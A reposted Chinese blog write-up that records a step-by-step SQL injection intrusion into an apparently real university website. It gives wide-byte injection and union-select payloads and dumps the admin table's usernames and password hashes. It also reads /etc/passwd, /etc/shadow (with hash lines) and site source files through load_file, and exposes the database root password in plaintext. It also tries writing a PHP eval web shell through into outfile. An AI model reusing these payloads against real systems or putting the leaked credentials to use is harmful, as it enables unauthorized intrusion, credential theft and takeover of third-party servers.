- A+
显示不全请点击全屏阅读
站点:http://xxxx.xxxx.edu.cn
注入点:http://xxxxx.xxxxx.edu.cn/news_view.php?id=94
提交 %bf’ 出现错误,由此可见存在宽字节注入
接着 %bf%27 and1=1 %23 正确返回
%bf%27 order by 10 %23
返回正确 判断当前页面字段数当前页面字段数为10
接着渗透
%bf%27%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10%23
返回正确 返回3 9
用database() 爆出 数据库名字为 international
直接爆表
先用dual表判断了一下 information.schema.tables 是否可用
判断结果 成功返回3 9,这样判断information_schema.table
可用。
接着用 table_name 替代3 同时在后边加上查询条件 where TABLE_NAME=
0x696E7465726E6174696F6E616C international的十六进制
返回表名 i_admin 初步判断为 管理员账号所在的表
通过limit 条件
接着爆表
i_admin
i_application_configs
i_application_information_step1
i_application_information_step2
i_application_information_step3
i_application_userbasic
i_count
i_department
。。。下面就不爆了
接着爆 i_admin 的 字段
1,2,3,4,5,6,7,8,9,10 frominformation_schema.COLUMNS
正确返回数字
i_admin 十六进制0x695F61646D696E
加上 where 条件 后 返回 字段 uid
接着加limit条件 爆出所有的字段
uid
m_id
username
password
name
state
至此 i_admin 的字段名全部爆出。
接着爆 username 和password 这两个
问题出现了 换成 username 和password 返回错误??而uid和state没错误
Hex编码解决问题
Hex(username)
6A73 js
Hex(password)
63316661363261616xxxxxxxxxxxx64323062383732666663366531303936
c1fa62aaeb049f62d20b872ffc6e1096
rxxxxxxx7
rxxxxxxx7
61646D696E admin
65313832613535xxxxxxxxxxxx36662626138316166636564343631
jxxxxxxxx2
7A687A
30343938303530xxxxxxxxxxxxxx466353730346337643336656438
jsxxxxxxxxxxx2
到此拿下后台密码
————————————————-
换一种思路
因为 是 root权限 ..到这了。。
load_file(0x2F6574632F706173737764) //读/etc/passwd文件
返回
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message
bus:/:/sbin/nologin a
vahi:x:70:70:Avahi
daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
nscd:x:28:28:NSCD
Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual
console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper
RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service
User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS
User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated
SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
haldaemon:x:68:68:HALdaemon:/:/sbin/nologin
xfs:x:43:43:X Font
Server:/etc/X11/fs:/sbin/nologin
mysql:x:500:500::/home/mysql:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
zf_job:x:501:501::/opt/www_application/job:/bin/bash
angang523409:x:502:0::/home/angang523409:/bin/bash
syyy:x:503:503::/opt/www_application/syyy:/bin/bash
网站所在目录
读:/opt/www_application/xxxxx/news_view.php
0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F6E6577735F766965772E706870
replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F6E6577735F766965772E706870),char(60),char(32))
?php include_once(‘global.php’); if(isset($_GET[id])){$sql=”update i_newsbase set hits=hits+1 where id=”.$_GET[id];mysql_query($sql); $query_view = mysql_query(“SELECT * FROM `i_newsbase`WHERE `id`=’$_GET[id]’;”); $row_view = mysql_fetch_array($query_view); }?> !DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN””http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”> htmlxmlns=”http://www.w3.org/1999/xhtml”> head> metahttp-equiv=”Content-Type” content=”text/html; charset=GB2312″/> title> ?=$row_view[title]?> – ?=$row_arr[websitename]?> /title> ?php include_once(‘header.php’);?> !–contene–> div id=”contene_”> divid=”box_l”> div id=”box_r”> divid=”l_box”> div> div>h3>Focus News /h3> /div> ?php $query_news = mysql_query(“SELECT *FROM `i_newsbase` order by `date_time` desc limit 12 “); while($row_news =mysql_fetch_array($query_news)){ ?> p> span> atitle=” ?=$row_news[title]?>” href=”news_view.php?id=?=$row_news[id]?>”> ?php if(strlen($row_news[title])>40) { echo$db->titlesubstr($row_news[title],0,40).”…” ;} else echo$row_news[title]; ?> /a> /span> /p> ?php } ?> /p> /div>/div> /div> /div> div id=”box_l_”> divid=”box_r_”> div id=”r_box”> div>h3> a href=”index.php”>Home /a> span>» /span> a href=”news_list.php”>News /a>/h3> /div> div> div>?php $query_all = mysql_query(“SELECT * FROM `i_newsbase` as`a`,`i_newscontent` as `b` where `a`.`id`=`b`.`nid` and `a`.`id`=’$_GET[id]’limit 1;”); $row_all = mysql_fetch_array($query_all); ?> divalign=”center” > ?=$row_all[title]?> /div> p> /p> pclass=”font” align=”center”>Date:?=date(“Y-m-d”,$row_all[date_time])?> /p> /div> ?=$row_all[content]?>/div> div> /div> /div> /div> /div>div> /div> div id=”ad”> /div>/div> ?php include_once(‘footer.php’); ?>
接着读取
Global.php
/opt/www_application/xxxxx/global.php
0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F676C6F62616C2E706870
replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F676C6F62616C2E706870),char(60),char(32))
返回
?php include_once (‘./configs/config.php’);include_once (‘./common/mysql.class.php’); include_once(‘./common/action.class.php’); include_once (‘./common/page.class.php’); $db =new action($mydbhost, $mydbuser, $mydbpw, $mydbname, ALL_PS, $mydbcharset);$query_config=$db->query(“SELECT * FROM `i_config`”); while($row_config=$db->fetch_array($query_config)){$row_arr[$row_config[name]]=$row_config[values];$row_eng[$row_config[name]]=$row_config[xxxxx_values]; } ?>
读 ./configs/config.php
/opt/www_application/xxxxx/configs/config.php
/opt/www_application/configs/config.php
0x2F6F70742F7777775F6170706C69636174696F6E2F636F6E666967732F636F6E6669672E706870
replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F636F6E666967732F636F6E6669672E706870),char(60),char(32))
返回空。。。。。。。。无此文件
/opt/www_application/xxxxx/configs/config.php
0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F636F6E666967732F636F6E6669672E706870
replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F636F6E666967732F636F6E6669672E706870),char(60),char(32))
返回:
?php include_once(‘db_config.php’);include_once(‘variable_config.php’);/****************************************************************************** 上传图片的参数说明:$max_file_size : 上传文件大小限制, 单位BYTE $destination_folder : 上传文件路径 $watermark : 是否附加水印(1为加水印,其他为不加水印); 使用说明: 1. 将PHP.INI文件里面的”extension=php_gd2.dll”一行前面的;号去掉,因为我们要用到GD库; 2. 将extension_dir =改为你的php_gd2.dll所在目录; ******************************************************************************/// 上传文件类型列表$uptypes=array( ‘image/jpg’, ‘image/jpeg’, ‘image/png’, ‘image/pjpeg’,’image/gif’, ‘image/bmp’, ‘image/x-png’ ); $max_file_size=2000000; //上传文件大小限制, 单位BYTE$destination_folder=”uploading/”; //上传文件路径 $watermark=1; //是否附加水印(1为加水印,其他为不加水印); $watertype=1; //水印类型(1为文字,2为图片)$waterposition=1; //水印位置(1为左下角,2为右下角,3为左上角,4为右上角,5为居中); $waterstring=”TY”;//水印字符串$waterimg=”xplore.gif”; //水印图片 $imgpreview=1; //是否生成预览图(1为生成,其他为不生成); $imgpreviewsize=1/1; //缩略图比例 ?>
/opt/www_application/xxxxx/configs/db_config.php
0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F636F6E666967732F64625F636F6E6669672E706870
replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F636F6E666967732F64625F636F6E6669672E706870),char(60),char(32))
返回
x
?php // 该文件为存储用户数据库的变量的文件 $mydbhost = “localhost”; $mydbuser = “root”;$mydbpw = “xyw1120”; $mydbname = “international”;$mydbcharset = “GBK”; ?>
目的达到:mysql 账号 root ,密码 xyw1120
/opt/www_application/xxxxx/1.php
select “dddd” into outfile’/var/www/data/suddytest.php’
select ‘<?php eval($_POST[cmd])?>’into outfile ‘D:/PHPnow-1.5.4/htdocs/index2.php’
select ‘<?php echo “HelloWorld”; ?>’ into outfile ‘/opt/www_application/xxxxx/index2.php’
757365726E616D65
/etc/vpn/server.conf
0x2F6574632F76706E2F736572766572 E636F6E66
replace(load_file(0x2F6574632F76706E2F736572766572E636F6E66),char(60),char(32))
replace(load_file(0x2F6574632F76706E2F736572766572E636F6E66),char(60),char(32))
扫一下端口
80 Open
111 Open
1723 Open
3306 Open
1723 vpn端口,从这个角度出发。。。。。接着渗透
读 /etc/shadow
0x2F6574632F736861646F77
replace(load_file(0x2F6574632F736861646F77),char(60),char(32))
内容如下
root:$1$PqDYAJMy$nrwxVO7zGgQsd.cNfzOSp0:14731:0:99999:7:::bin:$1$v/3WmY2W$jUw9sPr2kDkW0BvNB63gO.:14847:0:99999:7:::daemon:*:14215:0:99999:7::: adm:*:14215:0:99999:7::: lp:*:14215:0:99999:7:::sync:*:14215:0:99999:7::: shutdown:*:14215:0:99999:7::: halt:*:14215:0:99999:7:::mail:*:14215:0:99999:7::: news:*:14215:0:99999:7::: uucp:*:14215:0:99999:7:::operator:*:14215:0:99999:7::: games:*:14215:0:99999:7:::gopher:*:14215:0:99999:7::: ftp:*:14215:0:99999:7:::nobody:*:14215:0:99999:7::: rpm:!!:14215:0:99999:7::: dbus:!!:14215:0:99999:7:::avahi:!!:14215:0:99999:7::: mailnull:!!:14215:0:99999:7:::smmsp:!!:14215:0:99999:7::: nscd:!!:14215:0:99999:7:::vcsa:!!:14215:0:99999:7::: rpc:!!:14215:0:99999:7:::rpcuser:!!:14215:0:99999:7::: nfsnobody:!!:14215:0:99999:7::: sshd:!!:14215:0:99999:7:::pcap:!!:14215:0:99999:7::: haldaemon:!!:14215:0:99999:7:::xfs:!!:14215:0:99999:7::: mysql:!!:14218:0:99999:7::: apache:!!:14221::::::ntp:!!:14545:::::: zf_job:$1$.EE7dw2F$/G1ObIx0vfXZsZ/DBid/z0:14728:0:99999:7:::angang523409:$1$vA29oCDp$FJo378ewOAgvfu0c7tjwD0:14747:0:99999:7:::syyy:$1$38W/v5/Z$L5K9oIAdaFHH8js6fODFL/:15265:0:99999:7:::
转自:90sec
Tags:
如果您喜欢我的博客,欢迎点击图片定订阅到邮箱 也可以点击链接【订阅到鲜果】
如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡